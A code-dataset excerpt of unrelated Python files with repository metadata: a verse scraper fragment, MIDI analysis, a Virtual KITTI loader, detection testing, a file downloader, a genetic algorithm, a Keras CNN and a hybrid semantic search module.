        url = f"https://b.jw-cdn.org/apis/pub-media/GETPUBMEDIALINKS?pub=nwt&langwritten=E&txtCMSLang=E&fileformat=mp3&booknum={book_num}"
        return json.loads(requests.get(url).text)

    def construct_verse_id(self, book_num, chapter_num, verse_num):
        """Build the DOM id that wol.jw.org assigns to a verse element."""
        return f"v{book_num}-{chapter_num}-{verse_num}-1"

    def get_num_verses_in_chapter(self, chapter_num, json_data):
        """Count the audio markers of the chapter's MP3 entry (one per verse)."""
        chapter_entry = json_data["files"]["E"]["MP3"][int(chapter_num) - 1]
        return len(chapter_entry["markers"]["markers"])

    def get_num_chapters_in_book(self, json_data):
        """Number of chapters == number of MP3 files listed for the book."""
        return len(json_data["files"]["E"]["MP3"])

    def get_book_name(self, json_data):
        """Publication name reported by the CDN listing."""
        return json_data["pubName"]
class AppSettings:
    """Scraper-wide URL templates."""

    @staticmethod
    def main_verse_url(book_num, chapter_num):
        """URL of the online-library study page for one chapter."""
        chapter_path = f"{book_num}/{chapter_num}"
        return f"https://wol.jw.org/en/wol/b/r1/lp-e/nwtsty/{chapter_path}#study=discover"
if __name__ == "__main__":
    # Entry point: scrape all books/chapters and write verses.json.
    main()
| j-koziel/wol-api | scripts/scrape-verses/scrape_verses.py | scrape_verses.py | py | 3,978 | python | en | code | 5 | github-code | 1 | [
{
"api_name": "tqdm.tqdm",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "re.findall",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "requests.Session",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "concurrent.futures.ThreadPoolEx... |
73667290594 | from fractions import Fraction
from re import search, findall
from converter import get_absolute_path_for_file, text_files_folder_path
analysis_folder_path = 'analysis'

# (ticks per sub-division, sub-divisions per bar); 480/8 o 960/16
resolution = 480, 4

# Regexes for the text dump produced by the converter step.
exp_pitch = r'pitch=(\d+) '
exp_vol = r'vol=(\d+)'
exp_time = r'Time=(\d+) '
exp_division = r'division=(\d+)'
exp_signature = r'signature=(\d+)\/(\d+)'


def get_notes(text_file_name: str) -> list:
    """Parse a MIDI text dump into note records.

    Each record is [pitch, velocity, duration, closed, start_tick, bar, sub_bar].
    A 'Note on' opens a record (closed=False, duration=-start); the matching
    'Note off' adds its tick to the duration and marks it closed.

    NOTE: assumes 'division' and 'signature' lines appear before the first
    note event; otherwise `div` is unbound (same as the original behaviour).
    """
    note = []
    with open(text_file_name, mode='r') as fhandler:
        for i in fhandler:
            if 'division' in i:
                division_match = search(exp_division, i)
                if division_match:
                    division = int(division_match.groups()[0])
                    if division != 480:
                        print(f"WARNING Division: {division}")
            if 'signature' in i:
                signature_match = search(exp_signature, i)
                if signature_match:
                    numerator = int(signature_match.groups()[0])
                    denominator = int(signature_match.groups()[1])
                    signature = Fraction(numerator, denominator)
                    # Ticks per bar = time signature * ticks/beat * sub-divisions.
                    div = signature * division * resolution[1]
                    print(div)
            if 'Note on' in i:
                if search(exp_pitch, i) and search(exp_vol, i) and search(exp_time, i):
                    n = int(findall(exp_pitch, i)[0])
                    v = int(findall(exp_vol, i)[0])
                    start = int(findall(exp_time, i)[0])
                    note.append(
                        [n, v, -start, False, start, int(start / div), int((start % div) / resolution[0])])
            if 'Note off' in i:
                if search(exp_pitch, i) and search(exp_vol, i) and search(exp_time, i):
                    n = int(findall(exp_pitch, i)[0])
                    end = int(findall(exp_time, i)[0])
                    res = [item for item in note if item[0] == n and item[3] == False]
                    # BUG FIX: a 'Note off' with no open matching note used to
                    # raise IndexError on res[0]; skip it like the ambiguous case.
                    if not res:
                        print('error')
                        continue
                    if len(res) > 1:
                        print('error')
                        continue
                    res[0][2] += end
                    res[0][3] = True
    return note
def generate_file_a(notes: list, analysis_a_file: str):
    """Write a human-readable listing of *notes* to *analysis_a_file*,
    emitting a header line whenever the bar or sub-bar changes.

    Each note is [pitch, velocity, duration, closed, start, bar, sub_bar].
    """
    with open(analysis_a_file, 'w') as output:
        current_bar = 0
        current_sub_bar = 0
        for entry in notes:
            bar, sub_bar = entry[5], entry[6]
            if bar != current_bar:
                output.write('------------- {0} -------------\n'.format(bar))
                current_bar = bar
            if sub_bar != current_sub_bar:
                output.write('--- {0} ---\n'.format(sub_bar))
                current_sub_bar = sub_bar
            # N=pitch D=duration V=velocity P=start position (ticks).
            output.write('N={0} D={2} V={1} P={3}\n'.format(entry[0], entry[1], entry[2], entry[4]))
def analysis_a(text_file: str):
    """Run analysis A: parse the MIDI text dump for *text_file* and write
    the bar/sub-bar report to the analysis folder."""
    source_path = get_absolute_path_for_file(text_file, text_files_folder_path, 'txt')
    parsed_notes = get_notes(source_path)
    print(parsed_notes)
    report_path = get_absolute_path_for_file(text_file, analysis_folder_path, 'txt')
    generate_file_a(parsed_notes, report_path)
| dpjn316gh/midi-analysis | midi_analysis.py | midi_analysis.py | py | 3,181 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "re.search",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 32,
... |
23196803682 | import os
from pkgutil import extend_path
import numpy as np
import PIL.Image as pil
import torch
import json
from .mono_dataset import MonoDataset
class Virtual_Kitti(MonoDataset):
    """Virtual KITTI loader: RGB frames plus dense depth from Camera_0."""

    def __init__(self, *args, **kwargs):
        super(Virtual_Kitti, self).__init__(*args, **kwargs)
        # Normalized camera intrinsics (scaled by image width/height).
        self.K = np.array([[0.58, 0, 0.5, 0],
                           [0, 1.92, 0.5, 0],
                           [0, 0, 1, 0],
                           [0, 0, 0, 1]], dtype=np.float32)
        self.full_res_shape = (1242, 375)
        self.rgb_head = 'rgb_'
        self.depth_head = 'depth_'
        self.depth_img_ext = '.png'

    def check_depth(self):
        # Ground-truth depth is always available for this dataset.
        return True

    def get_color(self, folder, frame_index, side, do_flip=False):
        """Load one RGB frame; mirror it horizontally when do_flip is set."""
        frame_name = self.rgb_head + str(frame_index).zfill(5) + self.img_ext
        frame_path = os.path.join(self.data_path, 'rgb', folder, 'frames/rgb/Camera_0', frame_name)
        color = self.loader(frame_path)
        return color.transpose(pil.FLIP_LEFT_RIGHT) if do_flip else color

    def get_depth(self, folder, frame_index, side, do_flip=False):
        """Load a 16-bit depth PNG and rescale it to metres (80 m max range)."""
        frame_name = self.depth_head + str(frame_index).zfill(5) + self.depth_img_ext
        depth_path = os.path.join(self.data_path, 'depth', folder, 'frames/depth/Camera_0', frame_name)
        depth_gt = np.array(pil.open(depth_path)).astype(np.float32) * 80.0 / 65535.0
        return np.fliplr(depth_gt) if do_flip else depth_gt
{
"api_name": "mono_dataset.MonoDataset",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "numpy.array",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "os.path.join"... |
2673782167 | import os.path
import sys
import threading
import time
import numpy as np
import torch
import yaml
import customDataset as dataset
import torchvision.transforms as tv
from torch.utils.data import DataLoader
import utils
import pandas as pd
import matplotlib.pyplot as plt
from model import NetworkModel
# Module-level configuration, populated by init() from the YAML configs.
img_test_path: str        # directory holding the test images
csv_test_path: str        # directory holding per-image annotation CSVs
dim: int                  # square input size fed to the network
no_of_classes: int        # number of object classes the model predicts
weights: dict             # state_dict loaded from the configured weights file
obj_in_grid: int          # objects predicted per grid cell
one_dataset_image: bool   # mode: test a single image from the DOTA dataset
one_random_image: bool    # mode: test a single arbitrary image (tiled)
draw_ground_truth: bool   # overlay ground-truth boxes in single-image mode
image_path: str           # image name/path used by the single-image modes
labels: dict              # class-label mapping from the pre-processing config
def init():
    """Load testing/general settings from the YAML configs into module globals."""
    global img_test_path, csv_test_path, dim, no_of_classes, weights
    global obj_in_grid, one_dataset_image, one_random_image, draw_ground_truth, labels

    with open('configs/model-config.yaml') as f:
        configs = yaml.safe_load(f)
    testing_cfg = configs['testing']
    general_cfg = configs['general']

    img_test_path = testing_cfg['testing_img']
    csv_test_path = testing_cfg['testing_csv']
    dim = general_cfg['img_dim']
    no_of_classes = general_cfg['no_of_classes']
    weights = torch.load(testing_cfg['weights'])
    obj_in_grid = general_cfg['objects_in_grid']
    one_dataset_image = testing_cfg['oneDatasetImage']
    one_random_image = testing_cfg['oneRandomImage']
    if one_dataset_image or one_random_image:
        # Only the single-image modes need a specific image path.
        global image_path
        image_path = testing_cfg['image']
    draw_ground_truth = testing_cfg['draw_ground_truth']

    with open('configs/pre-processing-config.yaml') as f:
        preproc_config = yaml.safe_load(f)
    labels = preproc_config['processImages']['labels']
def test_img_section(key, d):
    """Run inference on one tile of a cropped image (thread worker).

    Mutates d[key] in place and records the tile's predictions on the
    module-level `full_scale_pred` accumulator. Relies on the globals
    `network`, `dim`, `cropped` and `full_scale_pred` set up in __main__.
    """
    d[key] = np.float16(d[key])
    d[key] = utils.image_checks(d[key], dim, dim)
    # Dummy (1, 5) annotations: this code path has no ground truth per tile.
    d[key], annotations = utils.torch_prepare(d[key], np.zeros((1, 5)))
    with torch.no_grad():
        # NOTE(review): reads the global `cropped` rather than the `d`
        # parameter — works because the caller passes d=cropped; confirm intended.
        outputs = network(cropped[key])
    final_pred = utils.FinalPredictions(outputs.cpu(), annotations)
    full_scale_pred.add_prediction(key, final_pred)
if __name__ == "__main__":
    init()
    # Loading saved model
    network = NetworkModel(no_of_classes, obj_in_grid, testing=True)
    try:
        network.load_state_dict(weights)
    except RuntimeError:
        # state_dict shapes disagree with the constructed network.
        print('Weights from file don\'t match model\'s weights shape, please check number of classes'
              ' and number of objects to be detected in a grid cell')
        print('exiting...')
        time.sleep(2)
        sys.exit(-1)
    network.eval()
    network.cuda()
    if one_dataset_image:
        # Mode 1: single DOTA image with CSV annotations.
        print('Testing one image from DOTA dataset')
        annotations = pd.read_csv(os.path.join(csv_test_path, image_path + '.csv'), header=None)
        annotations = np.array(annotations)
        image = plt.imread(os.path.join(img_test_path, image_path + '.png'))
        image = image.astype(np.float16)
        image = utils.image_checks(image, dim, dim)
        image, annotations = utils.torch_prepare(image, annotations)
        with torch.no_grad():
            start = time.time_ns()
            outputs = network(image)
            end = time.time_ns()
        # ns -> ms
        inference_time = (end - start) * (10**(-6))
        print(f'Inference time: {inference_time}')
        print('Detected objects: ')
        plt.figure()
        final_pred = utils.FinalPredictions(outputs.cpu(), annotations)
        annt_test = utils.FinalPredictions(annotations, annotations)
        # Re-read the original image so the drawn boxes overlay the raw pixels.
        image = plt.imread(os.path.join(img_test_path, image_path + '.png'))
        final_pred.draw_boxes()
        if draw_ground_truth:
            annt_test.draw_boxes(truths=True)
        plt.imshow(image)
        plt.show(block=True)
    elif one_random_image:
        # Mode 2: arbitrary image, tiled into crops and processed by threads.
        print('Testing one random image')
        cropped = utils.crop_img(image_path, dim)
        full_scale_pred = utils.FullScalePrediction()
        threads = []
        for key in cropped:
            thread = threading.Thread(target=test_img_section, args=(key, cropped))
            threads.append(thread)
        [t.start() for t in threads]
        [t.join() for t in threads]
        plt.figure()
        img = plt.imread(image_path)
        # Map per-tile predictions back onto full-image coordinates.
        full_scale_pred.to_full_scale()
        full_scale_pred.draw()
        plt.imshow(img)
        plt.show(block=True)
    else:
        # Mode 3: evaluate the whole testing dataset (mAP + timing stats).
        print('Loading the testing dataset...')
        transform = tv.Compose([tv.ToTensor()])
        testing_dataset = dataset.AerialImagesDataset(
            csv_test_path, img_test_path, dim, no_of_classes, obj_in_grid, transform=transform)
        print('Dataset ready')
        print('Loading the testing dataloader...')
        test_loader = DataLoader(dataset=testing_dataset, batch_size=1, shuffle=False, num_workers=1)
        print('Testing dataloader ready')
        device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
        durations = []
        for i, (image, annotations) in enumerate(test_loader):
            image = image.to(device)
            # Flatten targets to (batch, 7*7*(5+classes)) — 49 grid cells.
            annotations = annotations.reshape(-1, 49 * (5 + no_of_classes))
            with torch.no_grad():
                start = time.time_ns()
                outputs = network(image)
                end = time.time_ns()
            duration_ms = (end-start) * (10**(-6))
            durations.append(duration_ms)
            # FinalPredictions accumulates stats used by utils.get_mAP() below.
            final_pred = utils.FinalPredictions(outputs.cpu().to(torch.float32), annotations.to(torch.float32))
        mAP = utils.get_mAP()
        print(f'mAP: {mAP}')
        avg_inf_time = np.sum(np.asarray(durations)) / len(durations)
        print(f'Average inference time: {avg_inf_time} ms')
        true_pos_count = utils.get_TP_count()
        all_pos_count = utils.get_P_count()
        print(f'Objects detected correctly count: {true_pos_count}'
              f'\n All objects in testing set: {all_pos_count} \n'
              f'Ratio: {true_pos_count/all_pos_count} \n'
              f'Average ratio per image: {utils.get_avg_ratio()}')
| edinitu/ObjectDetection | testing.py | testing.py | py | 5,896 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "yaml.safe_load",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "torch.load",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "yaml.safe_load",
"line_number": 58,
"usage_type": "call"
},
{
"api_name": "numpy.float16",
"line_nu... |
11085514285 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# author: beimingmaster@gmail.com
import os
import time
import json
import requests
from optparse import OptionParser
from common import config
def do_download(task_id):
    """Download the data file referenced by <data_path>/<task_id>/url.json.

    Reads the 'file_url' entry from url.json and streams it into data.json
    in 1 MiB chunks. Returns True on success, False otherwise. Existing
    data.json files are never overwritten.
    """
    print('do download work for task id: %s ...' % task_id)
    file_url = None
    url_json_file = '%s/%s/url.json' % (config.data_path, task_id)
    data_json_file = '%s/%s/data.json' % (config.data_path, task_id)
    print('url json file: ', url_json_file)
    print('data json file: ', data_json_file)
    if not os.path.exists(url_json_file):
        print('url json file does not exist: ', url_json_file)
        return False
    elif os.path.exists(data_json_file):
        # Already downloaded; do not overwrite.
        print('data json file does exist: ', data_json_file)
        return False
    with open(url_json_file, 'r', encoding='utf8') as f:
        url_json_data = json.load(f)
        if 'file_url' in url_json_data:
            file_url = url_json_data['file_url']
            print('file url: ', file_url)
    if not file_url:
        print('file url is no exists for task_id : %s' % task_id)
        return False
    try:
        # BUG FIX: the streamed response was never closed; use it as a
        # context manager so the connection is released in every path.
        with requests.get(file_url, timeout=10, stream=True, verify=None) as r:
            if r.status_code != 200:
                print('downloading task data has error: %s' % file_url)
                return False
            with open(data_json_file, 'wb') as f:
                for chunk in r.iter_content(chunk_size=1024*1024):
                    if chunk:
                        f.write(chunk)
        # BUG FIX: the success path previously fell through returning None.
        return True
    except Exception as ex:
        print('requests has error', ex)
        return False
if __name__ == '__main__':
    # CLI entry point: python download_cmd.py -t <task_id>
    parser = OptionParser()
    parser.add_option('-t', '--task', type='string', dest='task_id', help='task id to analysis')
    (options, args) = parser.parse_args()
    print('options: ', options)
    print('args: ', args)
    task_id = options.task_id
    if task_id:
        # Time the download for the log line below.
        start = time.time()
        do_download(task_id)
        end = time.time()
        print('doing download work takes %.2fs!' % (end-start))
    else:
        print('task id not provided')
| beimingmaster/jrmanalysis | cmd/download_cmd.py | download_cmd.py | py | 2,132 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "common.config.data_path",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "common.config",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "common.config.data_path",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name"... |
40096865876 | #!/usr/bin/env python
import random
import logging
import datetime
import cPickle
from time import time
class GeneticAlgorithm(object):
    """Runs genetic algorithm, contains chromosomes and applies fitness,
    selection, recombination and mutation methods to them.

    NOTE: this module is Python 2 (cPickle, `print >> out` syntax). The
    fitness/selection/recombination strategies and the chromosome class are
    injected by the caller, so this class only orchestrates the GA loop.
    """
    def __init__(self,
                 population_size,
                 survivors_per_round,
                 generations,
                 mutation_rate,
                 peptide_length,
                 fitness_function,
                 selection_function,
                 recombination_function,
                 chromosome_type,
                 chromosome_elements):
        # GA hyper-parameters.
        self.population_size = population_size
        self.survivors_per_round = survivors_per_round
        self.generations = generations
        self.mutation_rate = mutation_rate
        self.chromosome_length = peptide_length
        self.current_generation = 0
        self.population = None
        # Pluggable strategy callables supplied by the caller.
        self.selection_func = selection_function
        self.fitness_function = fitness_function
        self.recombination_function = recombination_function
        self.chromosome_type = chromosome_type
        self.elements = chromosome_elements
        # Per-round statistics; written to ga-summary.txt by final_summary().
        self.run_record = []
        self.do_logging = True
        self._init_time = time()
        self._setup_ga()

    def run(self, do_logging=True):
        """Run selection rounds until `generations` rounds have completed."""
        if do_logging:
            # NOTE(review): logging can only be switched ON here, never off —
            # do_logging=False leaves the default True in place. Confirm intended.
            self.do_logging = True
        logging.info("-----RUNNING-GA-----")
        while self.current_generation < self.generations:
            self._run_selection_round()
        if self.do_logging:
            logging.info("-----FINISHED------")
            self.log_status()
        self.final_summary()

    def log_status(self):
        """Log population size, round progress, elapsed time, average fitness."""
        ave_fitness = lambda:sum(c.fitness for c in
                                 self.population)/self.population_size
        logging.info("\n\n..........")
        logging.info("Population size: %d" % self.population_size)
        logging.info("Survivors per round: %d" % self.survivors_per_round)
        logging.info("Current round %d/%d" % (self.current_generation,
                                              self.generations))
        time_elapsed = datetime.timedelta(seconds=round(time()-self._init_time))
        logging.info("Time elapsed %s" % str(time_elapsed))
        logging.info("Average Fitness %f" % ave_fitness())
        logging.info("..........\n\n")

    @classmethod
    def load_run(cls, f):
        """Restore a pickled GA run from file path *f*."""
        with open(f) as data:
            return cPickle.load(data)

    def save(self):
        """Pickle the whole GA state to round<N>.pkl in the working directory."""
        pickle_fname = "round%d.pkl" % self.current_generation
        with open(pickle_fname, 'wb') as f:
            cPickle.dump(self, f)

    def _setup_ga(self):
        """Validate parameters and build the random initial population."""
        assert self.survivors_per_round >= 2
        assert self.survivors_per_round < self.population_size
        assert 0.0 < self.mutation_rate < 1.0
        if self.do_logging:
            logging.info("\n\n\n-----BEGINNING-GA-RUN-----")
            logging.info("-----CALCULATING-INITIAL-GA-FITNESSES-----")
        self._random_initial_population()

    def _random_initial_population(self):
        """Fill the population with unique random chromosomes and score them."""
        random_chromosome = self.chromosome_type.random_chromosome
        self.population = []
        while len(self.population) < self.population_size:
            new_chromosome = random_chromosome(self.chromosome_length,
                                               self.mutation_rate,
                                               elements=self.elements)
            assert new_chromosome, "Failed to construct chromosome"
            # Reject duplicates so the starting pool is fully unique.
            if new_chromosome not in self.population:
                self.population.append(new_chromosome)
        self._calc_population_fitness()
        initial_statistics = {'initial_population': [(c.idx_name, c.fitness)
                                                     for c in self.population]}
        self.run_record.append(initial_statistics)

    def _calc_population_fitness(self):
        """Score the whole population with the injected fitness function."""
        fitnesses = self.fitness_function(self.population)
        for chromosome, fitness in zip(self.population, fitnesses):
            #Fitness function modifies chromosome fitness in place
            chromosome.fitness = fitness

    def _run_selection_round(self):
        """One GA generation: select survivors, recombine, mutate, rescore."""
        round_statistics = {'selected': [], 'children': []}
        seqs_as_str = lambda l: ", ".join(c.idx_name for c in l)
        if self.do_logging:
            self.log_status()
            logging.info("-----RUNNING-SELECTION-ROUND-----")
        self.current_generation += 1
        selected = []
        #Select survivors
        while len(selected) < self.survivors_per_round:
            selected_chromosomes = self.selection_func(self.population)
            # NOTE(review): this assert is vacuous — a non-empty list is always
            # truthy even if every membership test is False; it likely should
            # be all(s in self.population for s in selected_chromosomes).
            assert [s in self.population for s in selected_chromosomes]
            selected.extend(selected_chromosomes)
            #Delete chosen chromosomes from selection pool (i.e. population)
            for selected_chromosome in selected_chromosomes:
                self.population.remove(selected_chromosome)
        if self.do_logging:
            logging.info("SELECTED CHROMOSOMES: %s" % seqs_as_str(selected))
        round_statistics['selected'] = [(c.idx_name, c.fitness)
                                        for c in selected]
        #Recombination of survivors to make children
        #Randomly select pairs of parents until there are enough children
        children = []
        while len(children) < self.population_size:
            p1, p2 = _random_choose_two(selected)
            new_sequence = self.recombination_function(p1.sequence, p2.sequence)
            #Random mutation of children
            child = self.chromosome_type(new_sequence, self.mutation_rate,
                                         elements=self.elements)
            child.mutate()
            #Do not add duplicate sequences
            if child.sequence not in [c.sequence for c in children]:
                children.append(child)
        if self.do_logging:
            logging.info("NEXT GENERATION: %s" % seqs_as_str(children))
        num_unique_sequences = len(set(c.sequence for c in children))
        assert num_unique_sequences == self.population_size
        self.population = children
        self._calc_population_fitness()
        round_statistics['children'] = [(c.idx_name, c.fitness)
                                        for c in self.population]
        self.run_record.append(round_statistics)
        # Checkpoint the whole GA state after every round.
        self.save()

    def final_summary(self):
        """Write ga-summary.txt listing names and fitnesses for every round."""
        with open('ga-summary.txt', 'w') as out:
            line = "Name: %s, Fitness %s"
            print>>out, "Initial Population:"
            for (name, fitness) in self.run_record[0]['initial_population']:
                print>>out, line % (name, fitness)
            print>>out, '\n'
            for i, ga_round in enumerate(self.run_record[1:]):
                print>>out, "Round %d" % (i+1)
                for step in ('selected', 'children'):
                    print>>out, step
                    for (name, fitness) in ga_round[step]:
                        print>>out, line % (name, fitness)
                print>>out
def _random_choose_two(seq):
a = random.choice(seq)
b = random.choice(seq)
while b is not a:
b = random.choice(seq)
return a, b
| fergaljd/pep_ga | ga.py | ga.py | py | 7,279 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "time.time",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 43,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "logging.info",
"line_number":... |
32521441026 | from keras.models import Sequential
from keras.layers import Conv2D, MaxPooling2D, Flatten, Dense
from keras.callbacks import History
import matplotlib.pyplot as plt
from preprocessing import X_train, X_val, y_train, y_val
# Build model: two conv+pool stages followed by a dense head for binary
# (tumor / no-tumor) classification of 64x64 RGB images.
model = Sequential()
model.add(Conv2D(32, (3, 3), activation='relu', input_shape=(64, 64, 3)))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Flatten())
model.add(Dense(64, activation='relu'))
# Single sigmoid unit -> probability of the positive class.
model.add(Dense(1, activation='sigmoid'))

# Compile model with binary cross-entropy, matching the sigmoid output.
model.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])

# Train model; the History callback records per-epoch metrics for the plots.
history = History()
model.fit(X_train, y_train, validation_data=(X_val, y_val), epochs=10, callbacks=[history])

# Plot training & validation accuracy values
plt.plot(history.history['accuracy'])
plt.plot(history.history['val_accuracy'])
plt.title('Model accuracy')
plt.ylabel('Accuracy')
plt.xlabel('Epoch')
plt.legend(['Train', 'Test'], loc='upper left')
plt.savefig('static/accuracy_plot.png')  # Save plot as image (served by the web app)
plt.show()
plt.close()  # Close the figure

# Plot training & validation loss values
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('Model loss')
plt.ylabel('Loss')
plt.xlabel('Epoch')
plt.legend(['Train', 'Test'], loc='upper left')
plt.savefig('static/loss_plot.png')  # Save plot as image (served by the web app)
plt.show()
plt.close()  # Close the figure

# Save model weights + architecture in HDF5 format for later inference.
model.save('brain_tumor_model.h5')
| alfalfs/Cancer_Detection_using_CCN | model.py | model.py | py | 1,521 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "keras.models.Sequential",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "keras.layers.Conv2D",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "keras.layers.MaxPooling2D",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "k... |
18509519039 | import logging
from sentence_transformers import CrossEncoder
from psycopg.rows import class_row
from ssearch.core.db.postgres import db
from ssearch.core.models import SearchResult, DocumentMetadata
from ssearch.core.search.es import search_es
from ssearch.core.search.vector import search_faiss, fetch_chunk_ids
# Cross-encoder used by rerank() to re-score merged ES + FAISS hits against
# the query; loaded once at import time.
cross_encoder = CrossEncoder('cross-encoder/ms-marco-MiniLM-L-12-v2')
def fetch_document_metadata(ids):
    """Fetch DocumentMetadata rows (id, file_name, file_type) for *ids*.

    Returns an empty list when the query fails so callers degrade gracefully
    instead of propagating database errors.
    """
    try:
        with db.connect() as conn:
            cursor = conn.cursor(row_factory=class_row(DocumentMetadata))
            cursor.execute(
                "SELECT id, file_name, file_type FROM documents WHERE id = ANY(%s)", [ids])
            rows = cursor.fetchall()
            conn.commit()
            return rows
    except Exception as e:
        logging.error(f"Error fetching document metadata: {e}")
        return []
def rerank(query, results: list[SearchResult]) -> list[SearchResult]:
    """Re-score *results* with the module-level cross-encoder and sort best-first.

    Mutates each result's .score in place and sorts the list in place;
    the list is also returned for convenience.
    """
    pairs = [(query, hit.chunk_text) for hit in results]
    scores = cross_encoder.predict(pairs)
    for result, score in zip(results, scores):
        result.score = score
    results.sort(key=lambda x: x.score, reverse=True)
    return results
def merge_results(es_results, faiss_results):
    """Concatenate ES and FAISS hits, de-duplicating by result id.

    When both backends return the same id, the FAISS copy wins (it appears
    later in the concatenation, and dict insertion keeps the last value per
    key while preserving first-seen order).
    """
    unique_by_id = {}
    for hit in es_results + faiss_results:
        unique_by_id[hit.id] = hit
    return list(unique_by_id.values())
def search_hybrid(query, top_k):
    """Hybrid search: merge ES and FAISS hits, rerank, and attach doc metadata.

    Returns the reranked results, each with a .metadata attribute holding the
    document's DocumentMetadata (or None when the metadata lookup failed).
    """
    es_results = search_es(query, top_k)
    ids = search_faiss(query, top_k)
    faiss_results = fetch_chunk_ids(ids)
    results = merge_results(es_results, faiss_results)
    results = rerank(query, results)
    document_ids = [result.document_id for result in results]
    document_metadata = fetch_document_metadata(document_ids)
    metadata_dict = {metadata.id: metadata for metadata in document_metadata}
    for result in results:
        # BUG FIX: fetch_document_metadata returns [] on database errors, so a
        # plain dict lookup raised KeyError here; fall back to None instead.
        result.metadata = metadata_dict.get(result.document_id)
    return results
if __name__ == "__main__":
    # Manual smoke test for the full hybrid search pipeline.
    query = "What is diffusion?"
    top_k = 10
    results = search_hybrid(query, top_k)
    print(results)
    # The commented-out lines below are debug probes for exercising each
    # pipeline stage (ES-only, FAISS-only, merge, rerank) in isolation.
    # es_results = search_es(query, top_k)
    # print(es_results)
    # ids = search_faiss(query, top_k)
    # faiss_results = fetch_chunk_ids(ids)
    # print(faiss_results)
    # results = es_results + faiss_results
    # results = rerank(query, results)
    # print(results)
| SaeedAnas/Generative-AI | ssearch/core/search/hybrid.py | hybrid.py | py | 2,400 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sentence_transformers.CrossEncoder",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "ssearch.core.db.postgres.db.connect",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "ssearch.core.db.postgres.db",
"line_number": 16,
"usage_type": "na... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.